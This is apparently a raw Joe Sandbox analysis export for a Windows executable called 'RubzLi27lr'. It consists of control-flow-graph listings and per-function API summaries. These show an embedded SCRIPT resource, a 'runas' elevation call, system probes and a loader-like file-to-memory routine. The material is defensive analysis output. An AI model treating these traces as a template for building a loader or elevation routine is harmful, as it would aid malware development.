96768->96767 96769->96707 96770->96714 96771->96740 96772->96717 96773->96721 96774->96740 96775->96712 96776->96734 96777->96734 96778->96739 96779->96739 96780->96739 96781->96752 
96782->96740 96783->96740 96784->96744 96785->96740 96787 ad0a95 96786->96787 96788 ad0a97 IsProcessorFeaturePresent 96786->96788 96787->96710 96790 ad0c5d 96788->96790 96794 ad0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96790->96794 96792 ad0d40 96792->96710 96793->96768 96794->96792 96803 ae8585 96795->96803 96797 ae862b 96797->96670 96798->96664 96799->96670 96800->96666 96801->96671 96802->96670 96804 ae8591 ___scrt_is_nonwritable_in_current_image 96803->96804 96814 ae5147 EnterCriticalSection 96804->96814 96806 ae859f 96807 ae85c6 96806->96807 96808 ae85d1 96806->96808 96815 ae86ae 96807->96815 96830 adf2d9 20 API calls __dosmaperr 96808->96830 96811 ae85cc 96831 ae85fb LeaveCriticalSection __wsopen_s 96811->96831 96813 ae85ee __wsopen_s 96813->96797 96814->96806 96832 ae53c4 96815->96832 96817 ae86c4 96845 ae5333 21 API calls 2 library calls 96817->96845 96818 ae86be 96818->96817 96820 ae53c4 __wsopen_s 26 API calls 96818->96820 96829 ae86f6 96818->96829 96822 ae86ed 96820->96822 96821 ae53c4 __wsopen_s 26 API calls 96823 ae8702 CloseHandle 96821->96823 96826 ae53c4 __wsopen_s 26 API calls 96822->96826 96823->96817 96827 ae870e GetLastError 96823->96827 96824 ae871c 96825 ae873e 96824->96825 96846 adf2a3 20 API calls __dosmaperr 96824->96846 96825->96811 96826->96829 96827->96817 96829->96817 96829->96821 96830->96811 96831->96813 96833 ae53e6 96832->96833 96834 ae53d1 96832->96834 96837 adf2c6 __dosmaperr 20 API calls 96833->96837 96839 ae540b 96833->96839 96835 adf2c6 __dosmaperr 20 API calls 96834->96835 96836 ae53d6 96835->96836 96838 adf2d9 __dosmaperr 20 API calls 96836->96838 96840 ae5416 96837->96840 96842 ae53de 96838->96842 96839->96818 96841 adf2d9 __dosmaperr 20 API calls 96840->96841 96843 ae541e 96841->96843 96842->96818 96844 ae27ec pre_c_initialization 26 API calls 96843->96844 96844->96842 96845->96824 96846->96825 96847->96122 96848 180de68 96862 180baa8 96848->96862 96850 180df38 96865 
180dd58 96850->96865 96852 180df61 CreateFileW 96854 180dfb0 96852->96854 96855 180dfb5 96852->96855 96855->96854 96856 180dfcc VirtualAlloc 96855->96856 96856->96854 96857 180dfed ReadFile 96856->96857 96857->96854 96858 180e008 96857->96858 96859 180cb18 12 API calls 96858->96859 96860 180e022 96859->96860 96861 180cd58 GetPEB GetPEB 96860->96861 96861->96854 96864 180c133 96862->96864 96868 180ef78 GetPEB 96862->96868 96864->96850 96866 180dd61 Sleep 96865->96866 96867 180dd6f 96866->96867 96868->96864 96869 af2ba5 96870 af2baf 96869->96870 96871 ab2b25 96869->96871 96903 ab3a5a 96870->96903 96897 ab2b83 7 API calls 96871->96897 96875 af2bb8 96910 ab9cb3 96875->96910 96878 af2bc6 96880 af2bce 96878->96880 96881 af2bf5 96878->96881 96879 ab2b2f 96887 ab2b44 96879->96887 96901 ab3837 49 API calls ___scrt_fastfail 96879->96901 96916 ab33c6 96880->96916 96884 ab33c6 22 API calls 96881->96884 96886 af2bf1 GetForegroundWindow ShellExecuteW 96884->96886 96893 af2c26 96886->96893 96888 ab2b5f 96887->96888 96902 ab30f2 Shell_NotifyIconW ___scrt_fastfail 96887->96902 96895 ab2b66 SetCurrentDirectoryW 96888->96895 96893->96888 96894 ab33c6 22 API calls 96894->96886 96896 ab2b7a 96895->96896 96934 ab2cd4 7 API calls 96897->96934 96899 ab2b2a 96900 ab2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96899->96900 96900->96879 96901->96887 96902->96888 96904 af1f50 __wsopen_s 96903->96904 96905 ab3a67 GetModuleFileNameW 96904->96905 96906 ab9cb3 22 API calls 96905->96906 96907 ab3a8d 96906->96907 96908 ab3aa2 23 API calls 96907->96908 96909 ab3a97 96908->96909 96909->96875 96911 ab9cc2 _wcslen 96910->96911 96912 acfe0b 22 API calls 96911->96912 96913 ab9cea __fread_nolock 96912->96913 96914 acfddb 22 API calls 96913->96914 96915 ab9d00 96914->96915 96915->96878 96917 af30bb 96916->96917 96918 ab33dd 96916->96918 96919 acfddb 22 API calls 96917->96919 96935 ab33ee 96918->96935 96922 af30c5 _wcslen 96919->96922 96921 ab33e8 96925 ab6350 96921->96925 96923 acfe0b 22 API 
calls 96922->96923 96924 af30fe __fread_nolock 96923->96924 96926 ab6362 96925->96926 96927 af4a51 96925->96927 96950 ab6373 96926->96950 96960 ab4a88 22 API calls __fread_nolock 96927->96960 96930 ab636e 96930->96894 96931 af4a5b 96932 af4a67 96931->96932 96933 aba8c7 22 API calls 96931->96933 96933->96932 96934->96899 96936 ab33fe _wcslen 96935->96936 96937 af311d 96936->96937 96938 ab3411 96936->96938 96940 acfddb 22 API calls 96937->96940 96945 aba587 96938->96945 96942 af3127 96940->96942 96941 ab341e __fread_nolock 96941->96921 96943 acfe0b 22 API calls 96942->96943 96944 af3157 __fread_nolock 96943->96944 96947 aba59d 96945->96947 96949 aba598 __fread_nolock 96945->96949 96946 aff80f 96947->96946 96948 acfe0b 22 API calls 96947->96948 96948->96949 96949->96941 96951 ab6382 96950->96951 96956 ab63b6 __fread_nolock 96950->96956 96952 af4a82 96951->96952 96953 ab63a9 96951->96953 96951->96956 96955 acfddb 22 API calls 96952->96955 96954 aba587 22 API calls 96953->96954 96954->96956 96957 af4a91 96955->96957 96956->96930 96958 acfe0b 22 API calls 96957->96958 96959 af4ac5 __fread_nolock 96958->96959 96960->96931 96961 ae8402 96966 ae81be 96961->96966 96964 ae842a 96971 ae81ef try_get_first_available_module 96966->96971 96968 ae83ee 96985 ae27ec 26 API calls pre_c_initialization 96968->96985 96970 ae8343 96970->96964 96978 af0984 96970->96978 96971->96971 96974 ae8338 96971->96974 96981 ad8e0b 40 API calls 2 library calls 96971->96981 96973 ae838c 96973->96974 96982 ad8e0b 40 API calls 2 library calls 96973->96982 96974->96970 96984 adf2d9 20 API calls __dosmaperr 96974->96984 96976 ae83ab 96976->96974 96983 ad8e0b 40 API calls 2 library calls 96976->96983 96986 af0081 96978->96986 96980 af099f 96980->96964 96981->96973 96982->96976 96983->96974 96984->96968 96985->96970 96988 af008d ___scrt_is_nonwritable_in_current_image 96986->96988 96987 af009b 97044 adf2d9 20 API calls __dosmaperr 96987->97044 96988->96987 96990 af00d4 96988->96990 96997 af065b 96990->96997 
96991 af00a0 97045 ae27ec 26 API calls pre_c_initialization 96991->97045 96996 af00aa __wsopen_s 96996->96980 97047 af042f 96997->97047 97000 af068d 97079 adf2c6 20 API calls __dosmaperr 97000->97079 97001 af06a6 97065 ae5221 97001->97065 97004 af06ab 97005 af06cb 97004->97005 97006 af06b4 97004->97006 97078 af039a CreateFileW 97005->97078 97081 adf2c6 20 API calls __dosmaperr 97006->97081 97010 af06b9 97082 adf2d9 20 API calls __dosmaperr 97010->97082 97012 af0781 GetFileType 97014 af078c GetLastError 97012->97014 97019 af07d3 97012->97019 97013 af0756 GetLastError 97084 adf2a3 20 API calls __dosmaperr 97013->97084 97085 adf2a3 20 API calls __dosmaperr 97014->97085 97016 af0704 97016->97012 97016->97013 97083 af039a CreateFileW 97016->97083 97018 af079a CloseHandle 97021 af0692 97018->97021 97022 af07c3 97018->97022 97087 ae516a 21 API calls 2 library calls 97019->97087 97080 adf2d9 20 API calls __dosmaperr 97021->97080 97086 adf2d9 20 API calls __dosmaperr 97022->97086 97024 af0749 97024->97012 97024->97013 97026 af07f4 97028 af0840 97026->97028 97088 af05ab 72 API calls 3 library calls 97026->97088 97027 af07c8 97027->97021 97033 af086d 97028->97033 97089 af014d 72 API calls 4 library calls 97028->97089 97031 af0866 97032 af087e 97031->97032 97031->97033 97035 af00f8 97032->97035 97036 af08fc CloseHandle 97032->97036 97034 ae86ae __wsopen_s 29 API calls 97033->97034 97034->97035 97046 af0121 LeaveCriticalSection __wsopen_s 97035->97046 97090 af039a CreateFileW 97036->97090 97038 af0927 97039 af095d 97038->97039 97040 af0931 GetLastError 97038->97040 97039->97035 97091 adf2a3 20 API calls __dosmaperr 97040->97091 97042 af093d 97092 ae5333 21 API calls 2 library calls 97042->97092 97044->96991 97045->96996 97046->96996 97048 af046a 97047->97048 97049 af0450 97047->97049 97093 af03bf 97048->97093 97049->97048 97100 adf2d9 20 API calls __dosmaperr 97049->97100 97052 af04a2 97055 af04d1 97052->97055 97102 adf2d9 20 API calls __dosmaperr 97052->97102 97053 af045f 
97101 ae27ec 26 API calls pre_c_initialization 97053->97101 97062 af0524 97055->97062 97104 add70d 26 API calls 2 library calls 97055->97104 97058 af051f 97060 af059e 97058->97060 97058->97062 97059 af04c6 97103 ae27ec 26 API calls pre_c_initialization 97059->97103 97105 ae27fc 11 API calls _abort 97060->97105 97062->97000 97062->97001 97064 af05aa 97066 ae522d ___scrt_is_nonwritable_in_current_image 97065->97066 97108 ae2f5e EnterCriticalSection 97066->97108 97068 ae5234 97069 ae5259 97068->97069 97074 ae52c7 EnterCriticalSection 97068->97074 97076 ae527b 97068->97076 97112 ae5000 97069->97112 97073 ae52a4 __wsopen_s 97073->97004 97075 ae52d4 LeaveCriticalSection 97074->97075 97074->97076 97075->97068 97109 ae532a 97076->97109 97078->97016 97079->97021 97080->97035 97081->97010 97082->97021 97083->97024 97084->97021 97085->97018 97086->97027 97087->97026 97088->97028 97089->97031 97090->97038 97091->97042 97092->97039 97095 af03d7 97093->97095 97094 af03f2 97094->97052 97095->97094 97106 adf2d9 20 API calls __dosmaperr 97095->97106 97097 af0416 97107 ae27ec 26 API calls pre_c_initialization 97097->97107 97099 af0421 97099->97052 97100->97053 97101->97048 97102->97059 97103->97055 97104->97058 97105->97064 97106->97097 97107->97099 97108->97068 97120 ae2fa6 LeaveCriticalSection 97109->97120 97111 ae5331 97111->97073 97113 ae4c7d __dosmaperr 20 API calls 97112->97113 97115 ae5012 97113->97115 97114 ae501f 97116 ae29c8 _free 20 API calls 97114->97116 97115->97114 97121 ae3405 11 API calls 2 library calls 97115->97121 97118 ae5071 97116->97118 97118->97076 97119 ae5147 EnterCriticalSection 97118->97119 97119->97076 97120->97111 97121->97115 97122 ab1044 97127 ab10f3 97122->97127 97124 ab104a 97163 ad00a3 29 API calls __onexit 97124->97163 97126 ab1054 97164 ab1398 97127->97164 97131 ab116a 97132 aba961 22 API calls 97131->97132 97133 ab1174 97132->97133 97134 aba961 22 API calls 97133->97134 97135 ab117e 97134->97135 97136 aba961 22 API calls 97135->97136 97137 ab1188 
97136->97137 97138 aba961 22 API calls 97137->97138 97139 ab11c6 97138->97139 97140 aba961 22 API calls 97139->97140 97141 ab1292 97140->97141 97174 ab171c 97141->97174 97145 ab12c4 97146 aba961 22 API calls 97145->97146 97147 ab12ce 97146->97147 97195 ac1940 97147->97195 97149 ab12f9 97205 ab1aab 97149->97205 97151 ab1315 97152 ab1325 GetStdHandle 97151->97152 97153 ab137a 97152->97153 97154 af2485 97152->97154 97158 ab1387 OleInitialize 97153->97158 97154->97153 97155 af248e 97154->97155 97156 acfddb 22 API calls 97155->97156 97157 af2495 97156->97157 97212 b2011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97157->97212 97158->97124 97160 af249e 97213 b20944 CreateThread 97160->97213 97162 af24aa CloseHandle 97162->97153 97163->97126 97214 ab13f1 97164->97214 97167 ab13f1 22 API calls 97168 ab13d0 97167->97168 97169 aba961 22 API calls 97168->97169 97170 ab13dc 97169->97170 97171 ab6b57 22 API calls 97170->97171 97172 ab1129 97171->97172 97173 ab1bc3 6 API calls 97172->97173 97173->97131 97175 aba961 22 API calls 97174->97175 97176 ab172c 97175->97176 97177 aba961 22 API calls 97176->97177 97178 ab1734 97177->97178 97179 aba961 22 API calls 97178->97179 97180 ab174f 97179->97180 97181 acfddb 22 API calls 97180->97181 97182 ab129c 97181->97182 97183 ab1b4a 97182->97183 97184 ab1b58 97183->97184 97185 aba961 22 API calls 97184->97185 97186 ab1b63 97185->97186 97187 aba961 22 API calls 97186->97187 97188 ab1b6e 97187->97188 97189 aba961 22 API calls 97188->97189 97190 ab1b79 97189->97190 97191 aba961 22 API calls 97190->97191 97192 ab1b84 97191->97192 97193 acfddb 22 API calls 97192->97193 97194 ab1b96 RegisterWindowMessageW 97193->97194 97194->97145 97196 ac1981 97195->97196 97197 ac195d 97195->97197 97221 ad0242 5 API calls __Init_thread_wait 97196->97221 97198 ac196e 97197->97198 97223 ad0242 5 API calls __Init_thread_wait 97197->97223 97198->97149 97200 ac198b 97200->97197 97222 ad01f8 
EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97200->97222 97202 ac8727 97202->97198 97224 ad01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97202->97224 97206 ab1abb 97205->97206 97207 af272d 97205->97207 97208 acfddb 22 API calls 97206->97208 97225 b23209 23 API calls 97207->97225 97211 ab1ac3 97208->97211 97210 af2738 97211->97151 97212->97160 97213->97162 97226 b2092a 28 API calls 97213->97226 97215 aba961 22 API calls 97214->97215 97216 ab13fc 97215->97216 97217 aba961 22 API calls 97216->97217 97218 ab1404 97217->97218 97219 aba961 22 API calls 97218->97219 97220 ab13c6 97219->97220 97220->97167 97221->97200 97222->97197 97223->97202 97224->97198 97225->97210 97227 b02a00 97241 abd7b0 ISource 97227->97241 97228 abdb11 PeekMessageW 97228->97241 97229 abd807 GetInputState 97229->97228 97229->97241 97231 b01cbe TranslateAcceleratorW 97231->97241 97232 abda04 timeGetTime 97232->97241 97233 abdb8f PeekMessageW 97233->97241 97234 abdb73 TranslateMessage DispatchMessageW 97234->97233 97235 abdbaf Sleep 97252 abdbc0 97235->97252 97236 b02b74 Sleep 97236->97252 97237 b01dda timeGetTime 97346 ace300 23 API calls 97237->97346 97238 ace551 timeGetTime 97238->97252 97241->97228 97241->97229 97241->97231 97241->97232 97241->97233 97241->97234 97241->97235 97241->97236 97241->97237 97247 abd9d5 97241->97247 97255 abec40 235 API calls 97241->97255 97257 abbf40 235 API calls 97241->97257 97259 abdfd0 97241->97259 97287 ac1310 97241->97287 97340 acedf6 97241->97340 97345 abdd50 235 API calls 97241->97345 97347 b23a2a 23 API calls 97241->97347 97348 b2359c 82 API calls __wsopen_s 97241->97348 97242 b02c0b GetExitCodeProcess 97245 b02c21 WaitForSingleObject 97242->97245 97246 b02c37 CloseHandle 97242->97246 97243 b429bf GetForegroundWindow 97243->97252 97245->97241 97245->97246 97246->97252 97248 b02a31 97248->97247 97249 b02ca9 Sleep 97249->97241 97252->97238 97252->97241 97252->97242 97252->97243 97252->97247 97252->97248 97252->97249 97349 
[Control-flow graph listing for the main module. The rendered graph did not survive extraction; what remains is its text export, a run of tokens of the form `<node id> <block address> <labels...>` and `<id>-><id>` edges, where the labels are Win32 API names, "call <address>" pairs or sandbox annotations such as "22 API calls". The Win32 APIs named on those blocks, grouped by the function they belong to:
  b1e97b: QueryPerformanceCounter, QueryPerformanceFrequency, Sleep (high-resolution timing / sleep helper)
  ad01f8, ad0242, ae5147, ae8d1c, ae2f5e: EnterCriticalSection, LeaveCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx (CRT thread-init and lock helpers)
  acee36, b0efaf: IsDialogMessageW, GetClassLongW
  b1e199, b1dbbe: GetFileAttributesW, lstrlenW, FindFirstFileW, FindClose (file-exists check)
  b22947 with callees b23017 and b22fd8: GetTempPathW, GetTempFileNameW, CopyFileW, DeleteFileW, CreateFileW, SetFileTime, CloseHandle (copy through a temporary file, then timestamp fix-up)
  b37f59 with callees: GetCurrentProcess, TerminateProcess, FreeLibrary, VirtualProtect (acfd1d), CharLowerBuffW (b38cd3)
  aba0db: CharUpperBuffW
  ab344d and ab3af0: RegOpenKeyExW, RegQueryValueExW, RegCloseKey; ab3357: GetFullPathNameW
  ab42de: GetVersionExW, GetCurrentProcess, IsWow64Process, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, GetSystemInfo, FreeLibrary (OS version and native-architecture probe)
  ad083f, ad0698, ad0992, ad096c, ae4b45: IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetModuleHandleW, GetStartupInfoW, GetStdHandle, GetFileType (MSVC CRT startup)
  ab3170 window procedure with ab3923, b1c161, ab30f2, ab3c50: PostQuitMessage, DefWindowProcW, SetTimer, KillTimer, RegisterWindowMessageW, CreatePopupMenu, MoveWindow, SetFocus, Shell_NotifyIconW, DeleteObject, DestroyWindow, LoadStringW (tray-icon message loop)]

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 234 ab42de-ab434d call aba961 GetVersionExW call ab6b57 239 af3617-af362a 234->239 240 ab4353 234->240 241 af362b-af362f 239->241 242 ab4355-ab4357 240->242 245 af3632-af363e 241->245 246 af3631 241->246 243 ab435d-ab43bc call ab93b2 call ab37a0 242->243 244 af3656 242->244 262 af37df-af37e6 243->262 263 ab43c2-ab43c4 243->263 249 af365d-af3660 244->249 245->241 248 af3640-af3642 245->248 246->245 248->242 251 af3648-af364f 248->251 252 ab441b-ab4435 GetCurrentProcess IsWow64Process 249->252 253 af3666-af36a8 249->253 251->239 255 af3651 251->255 258 ab4437 252->258 259 ab4494-ab449a 252->259 253->252 256 af36ae-af36b1 253->256 255->244 260 af36db-af36e5 256->260 261 af36b3-af36bd 256->261 264 ab443d-ab4449 258->264 259->264 268 af36f8-af3702 260->268 269 af36e7-af36f3 260->269 265 af36bf-af36c5 261->265 266 af36ca-af36d6 261->266 270 af37e8 262->270 271 af3806-af3809 262->271 263->249 267 ab43ca-ab43dd 263->267 272 ab444f-ab445e LoadLibraryA 264->272 273 af3824-af3828 GetSystemInfo 264->273 265->252 266->252 274 ab43e3-ab43e5 267->274 275 af3726-af372f 267->275 277 af3715-af3721 268->277 278 af3704-af3710 268->278 269->252 276 af37ee 270->276 279 af380b-af381a 271->279 280 af37f4-af37fc 271->280 281 ab449c-ab44a6 GetSystemInfo 272->281 282 ab4460-ab446e GetProcAddress 272->282 285 ab43eb-ab43ee 274->285 286 af374d-af3762 274->286 287 af373c-af3748 275->287 288 af3731-af3737 275->288 276->280 277->252 278->252 279->276 289 af381c-af3822 279->289 280->271 284 ab4476-ab4478 281->284 282->281 283 ab4470-ab4474 GetNativeSystemInfo 282->283 283->284 290 ab447a-ab447b FreeLibrary 284->290 291 ab4481-ab4493 284->291 292 af3791-af3794 285->292 293 ab43f4-ab440f 285->293 294 af376f-af377b 286->294 295 af3764-af376a 286->295 287->252 288->252 289->280 290->291 292->252 296 af379a-af37c1 292->296 297 ab4415 293->297 298 af3780-af378c 293->298 
294->252 295->252 299 af37ce-af37da 296->299 300 af37c3-af37c9 296->300 297->252 298->252 299->252 300->252
                                                                                                                  APIs
                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00AB430D
                                                                                                                    • Part of subcall function 00AB6B57: _wcslen.LIBCMT ref: 00AB6B6A
                                                                                                                  • GetCurrentProcess.KERNEL32(?,00B4CB64,00000000,?,?), ref: 00AB4422
                                                                                                                  • IsWow64Process.KERNEL32(00000000,?,?), ref: 00AB4429
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00AB4454
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AB4466
                                                                                                                  • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00AB4474
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00AB447B
                                                                                                                  • GetSystemInfo.KERNEL32(?,?,?), ref: 00AB44A0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                  • API String ID: 3290436268-3101561225
                                                                                                                  • Opcode ID: 268584ceac97166fa12bf21d3ef14bc531160fd55adb35bf20aa5839e54a3d3c
                                                                                                                  • Instruction ID: 30b8b920fa0de49739647a6f966e572dd46e58fd9413636157c26b17e432d6be
                                                                                                                  • Opcode Fuzzy Hash: 268584ceac97166fa12bf21d3ef14bc531160fd55adb35bf20aa5839e54a3d3c
                                                                                                                  • Instruction Fuzzy Hash: 74A1837690B2C4FFCB12D7AD7C411E57FEC7B2A740B084C99E18197A33DA60460ADB69

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00AB50AA,?,?,00000000,00000000), ref: 00AB42B2
                                                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AB50AA,?,?,00000000,00000000), ref: 00AB42C9
                                                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,00AB50AA,?,?,00000000,00000000,?,?,?,?,?,?,00AB4F20), ref: 00AF35BE
                                                                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00AB50AA,?,?,00000000,00000000,?,?,?,?,?,?,00AB4F20), ref: 00AF35D3
                                                                                                                  • LockResource.KERNEL32(00AB50AA,?,?,00AB50AA,?,?,00000000,00000000,?,?,?,?,?,?,00AB4F20,?), ref: 00AF35E6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                  • String ID: SCRIPT
                                                                                                                  • API String ID: 3051347437-3967369404
                                                                                                                  • Opcode ID: 78267e99e4301e23a61125688530ac750d384f1c3f80e818ac52ec33ec7e487a
                                                                                                                  • Instruction ID: 941e787c153b799be1b97b42f6f1e26023ba7e7b64e10f951824b7f273c6ff50
                                                                                                                  • Opcode Fuzzy Hash: 78267e99e4301e23a61125688530ac750d384f1c3f80e818ac52ec33ec7e487a
                                                                                                                  • Instruction Fuzzy Hash: 57117C75201B00BFEB218FA5DC49FA77BBDEBCAB51F204169F40296261DBB1D9109A20

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB2B6B
                                                                                                                    • Part of subcall function 00AB3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B81418,?,00AB2E7F,?,?,?,00000000), ref: 00AB3A78
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,?,?,00B72224), ref: 00AF2C10
                                                                                                                  • ShellExecuteW.SHELL32(00000000,?,?,00B72224), ref: 00AF2C17
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                                  • String ID: runas
                                                                                                                  • API String ID: 448630720-4000483414
                                                                                                                  • Opcode ID: a1c5142d6438b193cbcd300a4ab905ec5340ce44c5162be1cd2b8bfc7b60902e
                                                                                                                  • Instruction ID: 8f084c8e557d77dcdde2daf8649cc8c4a66056a22f167a1ae51af8a97f3a4373
                                                                                                                  • Opcode Fuzzy Hash: a1c5142d6438b193cbcd300a4ab905ec5340ce44c5162be1cd2b8bfc7b60902e
                                                                                                                  • Instruction Fuzzy Hash: 4411B4322093056ACB14FFA4DA51AFE7BECAB91740F44186DF146571B3CF218A4AD712
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(?,00AF5222), ref: 00B1DBCE
                                                                                                                  • GetFileAttributesW.KERNELBASE(?), ref: 00B1DBDD
                                                                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 00B1DBEE
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00B1DBFA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2695905019-0
                                                                                                                  • Opcode ID: 43db401e1372e31193c823b87c49acc951ba2ded165030d33a0af9ebee86fc62
                                                                                                                  • Instruction ID: 1f5fe16e08b2a579e2dfada08d9fa05e037384af31e8636158ada63d68ce8f30
                                                                                                                  • Opcode Fuzzy Hash: 43db401e1372e31193c823b87c49acc951ba2ded165030d33a0af9ebee86fc62
                                                                                                                  • Instruction Fuzzy Hash: 97F0A0388119105782606F78AC0D8EA3BACEE02334B904F42F936C20E0EFF05A94C6D5
                                                                                                                  APIs
                                                                                                                  • GetInputState.USER32 ref: 00ABD807
                                                                                                                  • timeGetTime.WINMM ref: 00ABDA07
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ABDB28
                                                                                                                  • TranslateMessage.USER32(?), ref: 00ABDB7B
                                                                                                                  • DispatchMessageW.USER32(?), ref: 00ABDB89
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ABDB9F
                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00ABDBB1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2189390790-0
                                                                                                                  • Opcode ID: 04959d9c0ff2e8e2f2ef5e04d9fbd9356b5cba01461293cb2e72773bf7a70618
